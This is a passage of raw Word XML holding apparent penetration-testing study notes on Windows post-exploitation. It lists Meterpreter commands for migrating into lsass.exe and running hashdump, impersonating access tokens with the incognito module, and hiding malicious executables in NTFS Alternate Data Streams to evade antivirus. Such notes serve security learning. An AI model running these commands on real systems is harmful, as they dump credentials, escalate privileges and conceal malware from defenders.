      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“migrate -N lsass.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FAA351" w14:textId="522DEBCB" w:rsidR="003C7EFF" w:rsidRDefault="003C7EFF" w:rsidP="003C7EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00456169">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>hashdump”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15389C8C" w14:textId="77777777" w:rsidR="008815EF" w:rsidRDefault="008815EF" w:rsidP="008815EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="708F11D2" w14:textId="485A06D0" w:rsidR="008815EF" w:rsidRDefault="008815EF" w:rsidP="008815EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Access </w:t>
      </w:r>
      <w:r w:rsidR="00E315F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Token Impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443F2DB5" w14:textId="4D577DD4" w:rsidR="00E315F1" w:rsidRDefault="00E315F1" w:rsidP="00E315F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Inherit the privileges to an authorized or highly privileged user account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038A049A" w14:textId="3B3681E1" w:rsidR="00E315F1" w:rsidRDefault="00E315F1" w:rsidP="00E315F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Windows access tokens are a core element of the authentication process on Windows and are created and managed by the Local Security Authority Subsystem Service (LSASS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EBB8E1" w14:textId="3F8A7A97" w:rsidR="004538F3" w:rsidRDefault="004538F3" w:rsidP="00E315F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>A Windows access token is responsible for identifying and describing the security context of a process or thread running on a system. Simply put, an access token can be thought of as a temporary key akin to a web cookie that provides users with access to a system or network resource without having to provide credentials each time a process is started, or a system resource is accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C50CE4" w14:textId="1350D803" w:rsidR="004538F3" w:rsidRDefault="00315B5F" w:rsidP="00E315F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Access tokens are generated by winlogon.exe process every time a user authenticates successfully and includes the identity and privileges of the user account associated with the thread or process. This token is then attached to a userinit.exe process, after which all child processes started by a user will inherit a copy of the access token from their creator and will run under the privileges of the same access token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E519F" w14:textId="77777777" w:rsidR="00003B62" w:rsidRDefault="00003B62" w:rsidP="00003B62">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F30FEF" w14:textId="257653D4" w:rsidR="00003B62" w:rsidRDefault="00003B62" w:rsidP="00003B62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Essentially used to restrict access to a user account and prevent it from executing or </w:t>
      </w:r>
      <w:r w:rsidR="001E7379">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>handling processes that it is not allowed to handle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2127D0E2" w14:textId="77777777" w:rsidR="00DA1F7D" w:rsidRPr="00DA1F7D" w:rsidRDefault="00DA1F7D" w:rsidP="00DA1F7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF09242" w14:textId="136D5159" w:rsidR="00DA1F7D" w:rsidRDefault="00DA1F7D" w:rsidP="00DA1F7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Windows access tokens are categorized based on the varying security levels assigned to them. These security levels are used to determine the privileges that are assigned to a specific token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D16A278" w14:textId="77777777" w:rsidR="001A6453" w:rsidRPr="001A6453" w:rsidRDefault="001A6453" w:rsidP="001A6453">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BCE86CF" w14:textId="28148AEC" w:rsidR="001A6453" w:rsidRDefault="001A6453" w:rsidP="001A6453">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Impersonate-level tokens are created as a direct result of a non-interactive login Windows, typically through specific system services or domain logons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34658D43" w14:textId="5D5417E8" w:rsidR="001A6453" w:rsidRDefault="001A6453" w:rsidP="001A6453">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Delegate-level tokens are typically created through an interactive login on Windows, primarily through a traditional login or through remote access protocols such as RDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D44020D" w14:textId="64CA0D82" w:rsidR="00D25AA3" w:rsidRDefault="00D25AA3" w:rsidP="00D25AA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Impersonate-level tokens can be used to impersonate a token on the local system and not on any external systems that utilize that token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4697B218" w14:textId="6DFAC788" w:rsidR="00D25AA3" w:rsidRDefault="00D25AA3" w:rsidP="00D25AA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Delegate-level tokens pose the largest threat as they can be used to impersonate tokens on any system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF2F68E" w14:textId="77777777" w:rsidR="00A06413" w:rsidRDefault="00A06413" w:rsidP="00A06413">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18085DCD" w14:textId="4201177B" w:rsidR="00A06413" w:rsidRDefault="00A06413" w:rsidP="00A06413">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Windows Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32115C60" w14:textId="6AE913D2" w:rsidR="00A06413" w:rsidRDefault="00A06413" w:rsidP="00A06413">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The process of impersonating access tokens to elevate privileges on a system will primarily depend on the privileges assigned to the account that has been exploited to gain initial access as well as the impersonation or delegation tokens available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69484C5A" w14:textId="498DADA0" w:rsidR="00995C7F" w:rsidRDefault="00995C7F" w:rsidP="00995C7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SeAssignPrimaryToken: Allows to impersonate tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D502391" w14:textId="0A9636DD" w:rsidR="00995C7F" w:rsidRDefault="00995C7F" w:rsidP="00995C7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SeCreateToken: Create an arbitrary token with admin priv.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ABE303" w14:textId="3AA114F4" w:rsidR="00995C7F" w:rsidRDefault="00995C7F" w:rsidP="002E1005">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SeImpersonatePrivilege: Create a process under a sec context with admin priv.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720795E7" w14:textId="1754CF3B" w:rsidR="00471697" w:rsidRDefault="00471697" w:rsidP="00471697">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If any of the above privileges are available on the local system (remember, “getprivs” will tell us this), we can impersonate the access tokens on that user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC9B05A" w14:textId="77777777" w:rsidR="002E1005" w:rsidRDefault="002E1005" w:rsidP="002E1005">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="234FDA6B" w14:textId="6E846DB8" w:rsidR="002E1005" w:rsidRDefault="002E1005" w:rsidP="002E1005">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Incognito Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599DF64C" w14:textId="3F9C4AA5" w:rsidR="002E1005" w:rsidRDefault="002E1005" w:rsidP="002E1005">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Incognito is a built-in meterpreter module that was originally a standalone application that allows you to impersonate user tokens after successful exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3095346D" w14:textId="11CECBF1" w:rsidR="002E1005" w:rsidRDefault="002E1005" w:rsidP="002E1005">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>We can use the incognito module to display a list of available tokens that we can impersonate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F60F238" w14:textId="4CD6679B" w:rsidR="00AF1F1C" w:rsidRDefault="00AF1F1C" w:rsidP="002E1005">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“load incognito” – IN METERPRETER SESSION</w:t>
      </w:r>
      <w:r w:rsidR="008A62E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (may need to run twice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7460827F" w14:textId="719CB701" w:rsidR="008A62E3" w:rsidRDefault="008A62E3" w:rsidP="002E1005">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="004A4E96">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>list_tokens -u” – List Delegation/Impersonation tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FBAEA5" w14:textId="608972FB" w:rsidR="003F7F86" w:rsidRDefault="003F7F86" w:rsidP="002E1005">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Impersonate_token “(DELEGATION TOKEN)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D38E1E6" w14:textId="6405E6FB" w:rsidR="00FC4830" w:rsidRDefault="00FC4830" w:rsidP="00FC4830">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Remember to re-migrate to the explorer.exe process to be able to use “getprivs”, it might be blocked originally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A92E1B0" w14:textId="6232C5FF" w:rsidR="00A960EF" w:rsidRDefault="00A960EF" w:rsidP="00A960EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If no delegation/impersonation tokens are available, we may need to use the Potato attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28114FDA" w14:textId="77777777" w:rsidR="009043B1" w:rsidRDefault="009043B1" w:rsidP="009043B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="296AE7C9" w14:textId="79697201" w:rsidR="009043B1" w:rsidRDefault="009043B1" w:rsidP="009043B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Windows File System Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1195F5" w14:textId="3DB6A05C" w:rsidR="009043B1" w:rsidRDefault="009043B1" w:rsidP="009043B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Alternate Data Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7FC9C7" w14:textId="5C2FA538" w:rsidR="009043B1" w:rsidRDefault="009043B1" w:rsidP="009043B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Alternate Data Streams (ADS) is an NTFS file attribute and was designed to provide compatibility with the MacOS HFS (hierarchical file system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456F0AC2" w14:textId="43FBBA62" w:rsidR="009043B1" w:rsidRDefault="009043B1" w:rsidP="009043B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NTFS (New Technology File System) is a file format that is default during the regular installation of Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE41EC9" w14:textId="54BFFF56" w:rsidR="009043B1" w:rsidRDefault="009043B1" w:rsidP="009043B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Any file created on an NTFS formatted drive will have two different forks/streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE88EA1" w14:textId="2F72735A" w:rsidR="009043B1" w:rsidRDefault="009043B1" w:rsidP="009043B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Data stream – Default stream that contains data of the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3251B3" w14:textId="3DBA4EEB" w:rsidR="009043B1" w:rsidRDefault="009043B1" w:rsidP="009043B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Resource stream – Typically contains the metadata of the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D83081" w14:textId="222ECBAC" w:rsidR="009043B1" w:rsidRDefault="009043B1" w:rsidP="009043B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Attackers can use ADS to hide malicious code or executables in legitimate files to evade detections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2357F8E2" w14:textId="31AC74AC" w:rsidR="009043B1" w:rsidRDefault="009043B1" w:rsidP="009043B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">This can be </w:t>
      </w:r>
      <w:r w:rsidR="00ED0143">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>done by storing the malicious code or executables in the file attribute resource stream (metadata) of a legitimate file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A5EF4" w14:textId="1AD2A4C2" w:rsidR="00ED0143" w:rsidRDefault="00ED0143" w:rsidP="009043B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">This technique is usually used to evade basic </w:t>
      </w:r>
      <w:r w:rsidR="002E4D3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>signature-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> AVs and static scanning tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CC78F2" w14:textId="5DF88BF5" w:rsidR="00417D85" w:rsidRDefault="00417D85" w:rsidP="00417D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will work on any modern version of Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FCBAF6" w14:textId="0C2ED127" w:rsidR="00F7307B" w:rsidRDefault="00F7307B" w:rsidP="00F7307B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“notepad</w:t>
      </w:r>
